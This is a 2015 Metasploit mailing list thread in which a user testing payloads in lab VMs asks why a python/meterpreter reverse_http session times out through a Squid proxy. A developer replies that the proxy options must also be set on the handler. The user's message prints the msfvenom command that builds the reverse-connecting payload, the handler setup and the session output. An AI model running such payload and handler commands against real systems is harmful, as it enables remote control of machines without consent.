Metasploit mailing list archives

Re: framework Digest, Vol 83, Issue 1


From: Spencer McIntyre <zerosteiner () gmail com>
Date: Tue, 03 Mar 2015 18:47:31 +0000

Mike Jones!

The PROXYHOST and PROXYPORT must also be set in the handler. This is
because when the stage is sent, the proxy settings are patched in by the
instance of Metasploit running on the attacker's system when it is requested
by the stager. Because of this, it's necessary to set the PROXYHOST and
PROXYPORT options to the same values on the handler as were specified when
creating the payload with msfvenom.

If, when the proxy options are set, the session still does not respond, it's
possible there is another issue, and opening a ticket on GitHub with the
output would be helpful for tracking.
https://github.com/rapid7/metasploit-framework/issues

I hope that helps Mike Jones!

On Tue, Mar 3, 2015 at 1:00 PM <framework-request () spool metasploit com>
wrote:

Today's Topics:

   1. python/meterpreter/reverse_http timeout (Mike Jones!)


----------------------------------------------------------------------

Message: 1
Date: Mon, 2 Mar 2015 12:35:01 -0800
From: "Mike Jones!" <property.of.mike.jones () gmail com>
To: framework <framework () spool metasploit com>
Subject: [framework] python/meterpreter/reverse_http timeout
Message-ID: <CAGZNKFsAxyymTa=LBa9KrK+JxeceyLT6nUU1wrhWXzxiU7YtEQ@mail.gmail.com>
Content-Type: text/plain; charset="utf-8"

I'm testing payloads through a proxy in my VMs and can't get any
meterpreter commands to work after the session opens.  All VMs are running
Debian.

Victim: 10.17.24.128
Proxy: 10.17.24.10 and 172.16.22.10 (running Squid)
Attacker: 172.16.22.22

I've generated a payload with msfvenom:
msfvenom -p python/meterpreter/reverse_http LHOST=172.16.22.22 LPORT=8080 PROXYHOST=10.17.24.10 PROXYPORT=3128

Set up a handler:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD python/meterpreter/reverse_http
PAYLOAD => python/meterpreter/reverse_http
msf exploit(handler) > set LHOST 172.16.22.22
LHOST => 172.16.22.22
msf exploit(handler) > set LPORT 8080
LPORT => 8080
msf exploit(handler) > exploit -j

Executing the payload on the victim looks fine.  Session hits on
metasploit, and I can interact with it but none of the commands respond:
msf exploit(handler) > [*] 172.16.22.10:52399 Request received for /x5LW...
[*] Meterpreter session 1 opened (172.16.22.22:8080 -> 172.16.22.10:52399) at 2015-03-02 14:12:10 -0600
sessions -l

Active sessions
===============

  Id  Type                       Information  Connection
  --  ----                       -----------  ----------
  1   meterpreter python/python               172.16.22.22:8080 -> 172.16.22.10:52399 (172.16.22.10)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ps
[-] Error running command ps: Rex::TimeoutError Operation timed out.

I tried setting up the handler with and without PROXYHOST and PROXYPORT;
neither way worked, though I suspect without those values is the correct
approach.  What am I missing?

Thanks in advance.